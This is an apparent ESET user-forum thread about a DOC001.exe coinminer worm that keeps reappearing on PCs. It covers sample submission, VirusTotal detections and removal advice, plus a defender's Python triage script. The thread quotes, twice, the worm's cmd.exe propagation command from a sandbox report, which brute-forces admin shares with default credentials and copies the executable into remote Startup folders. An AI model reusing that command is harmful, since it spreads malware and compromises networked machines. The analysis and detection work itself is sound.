
Is that "DC002. Exe" a name of a file? Is it detected by ESET? If not, please submit it to ESET for analysis as per FAQ on the right-hand side of this forum.

Have you also submitted logs as per the KB I referred to? Just knowing the file name doesn't tell anything.

If the file is DOC001.exe, it is possible the .exe is a coinminer: https://malwaretips.com/blogs/remove-doc001-exe/ .

The first question is how did you know you were infected? Do you have Eset installed and it detected something? If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so we can identify the malware.

So is it detected by ESET or not? If it is, under what name? If not, please submit it to samples[at]eset.com in an archive encrypted with the password "infected".

"The first question is how did you know you were infected?" I saw that drive C of most computers has that folder. Even if you delete it, it will reappear again. "Do you have Eset installed and it detected something?" I have Eset installed but it's not detecting. "If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so we can identify the malware."

Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.  

1 hour ago, Gerald KAmande said:

https://malwaretips.com/blogs/remove-doc001-exe/ . I have tried it; it detects, but the virus will still hit those PCs.

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?

Quote

When the scan has completed, you will be presented with a screen showing the malware infections that Malwarebytes has detected. To remove the malicious programs that Malwarebytes has found, click on the “Quarantine Selected” button.

Edited by itman

There's a May 4, 2019 analysis of DOC001.exe at Malware-Analysis here: https://www.hybrid-analysis.com/sample/f23435192769e92a832e8eba0dd769fc50e23fb41f11cd647ea2c550520f2f68?environmentId=100 . AV detection of the malware is quite high. And it does maintain persistence in the various Win startup locations as noted below. Appears it has loaded itself into every one of them!

Quote

cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temps\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temps\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 652)

cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temp\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temp\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 3880)

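As an added example (my own code, not from this thread, ESET or the Hybrid Analysis report), here is a small Python triage script a defender could run over process-creation telemetry to catch the combination of behaviours visible in the command lines quoted above: share discovery with net view, net use against C$/Users admin shares with supplied credentials, and xcopy of DOC001.exe from a Temp/Temps folder into a Startup folder. The indicator names, the "pid|image|command line" record format and the three sample events are constructed for the example; the second event only mimics the shape of the quoted command so the detector has something to fire on.

```python
import re
from typing import Dict, List

# Indicators derived from the behaviours in the quoted sandbox command lines.
# The names and regexes are my own assumptions about how this activity shows
# up in process-creation logs (Sysmon event 1, EDR telemetry, etc.).
INDICATORS = [
    ("net_view_discovery", re.compile(r"\bnet\s+view\b", re.I)),
    ("net_use_with_creds", re.compile(r"\bnet\s+use\b.*\s/user:", re.I)),
    ("admin_share_path", re.compile(r"\\\\[^\s\\]+\\(?:C\$|Users)(?=[\\\s\"]|$)", re.I)),
    ("xcopy_to_startup", re.compile(r"\bxcopy\b.*\\Start Menu\\Programs\\Startup\\", re.I)),
    ("doc001_in_temp", re.compile(r"\\Temps?\\DOC001\.exe", re.I)),
]

# Constructed sample records in the form "pid|image|command line".
# Event 1 and 3 are benign admin/build activity; event 2 is a condensed
# imitation of the propagation command quoted in the thread (not the real one).
SAMPLE_EVENTS = [
    r'4120|cmd.exe|cmd.exe /c dir "C:\Users\alice\Documents"',
    r'652|cmd.exe|cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\"`) do set str_!random!=%i)& net use \\WS-07\C$ "123" /user:"administrator" && echo f|xcopy /y /d "%APPDATA%\Temps\DOC001.exe" "\\WS-07\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe" & net use \\WS-07\C$ /delete /y',
    r'3304|cmd.exe|cmd.exe /c net use Z: \\FILESRV\releases /persistent:no /user:CORP\builder && xcopy /y "C:\build\out\app.exe" Z:',
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a 'pid|image|command line' record.

    Only the first two '|' are separators: the command line itself may contain
    pipes (the quoted sample uses 'find' and 'xcopy' behind them)."""
    pid, image, cmdline = line.split("|", 2)
    return {"pid": pid, "image": image, "cmdline": cmdline}


def matched_indicators(cmdline: str) -> List[str]:
    """Names of every indicator that fires on one command line, in list order."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def triage(events: List[str], min_hits: int = 2) -> List[Dict[str, object]]:
    """Return the events whose command line trips at least min_hits indicators.

    A lone 'net use ... /user:' is ordinary administration and is not reported
    on its own; the worm-like pattern is the combination of share discovery,
    authenticated admin-share access and a copy into a Startup folder."""
    findings = []
    for line in events:
        ev = parse_event(line)
        hits = matched_indicators(ev["cmdline"])
        if len(hits) >= min_hits:
            findings.append({"pid": ev["pid"], "image": ev["image"], "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"PID {finding['pid']} ({finding['image']}): {', '.join(finding['hits'])}")
```

Run against the constructed records, only the second event is reported, with all five indicators; the build script's single net use with credentials stays below the threshold. The regexes are deliberately narrow to the file name and paths named in this thread, so a real deployment would generalize the dropper indicator and tune min_hits against the environment's own admin tooling.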
19 hours ago, itman said:

Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.  

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?

I have uploaded the file; attached, see the results.

[attached screenshot]

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan
NsCpuCNMiner32.exe - a variant of Win32/CoinMiner.DQ potentially unwanted application
NsCpuCNMiner64.exe - a variant of Win64/CoinMiner.CZ potentially unwanted application

The first one is a NSIS archive, the detection was added in April 2018. The other 2 executables (PUAs) are inside the NSIS archive, the detection was added in July 2017.

1 hour ago, Marcos said:

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan

TrendMicro has an article on how to permanently remove this coinminer here: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_coinminer.inj . It does require some manual cleaning activities. Click on the "Solution" section. Substitute the "scan with TrendMicro" with a full in-depth scan using Eset Smart Security. 

If the above is too technically advanced for you, contact your regional Eset support concern for assistance: https://www.eset.com/int/


For reference, SANS has an article on a malware sample using the NSIS installer here: https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/ .

I believe this particular coinminer malware was deployed via a self-executing SFX archive using something along this line: https://gist.github.com/xymopen/951ef3d5301af55efd82eb67af129066 .

Make sure Eset's PUA protection is always enabled and don't ignore the warnings generated from it. It is far easier to prevent malware/nuisance-ware from being installed than trying to remove it later. 

Edited by itman
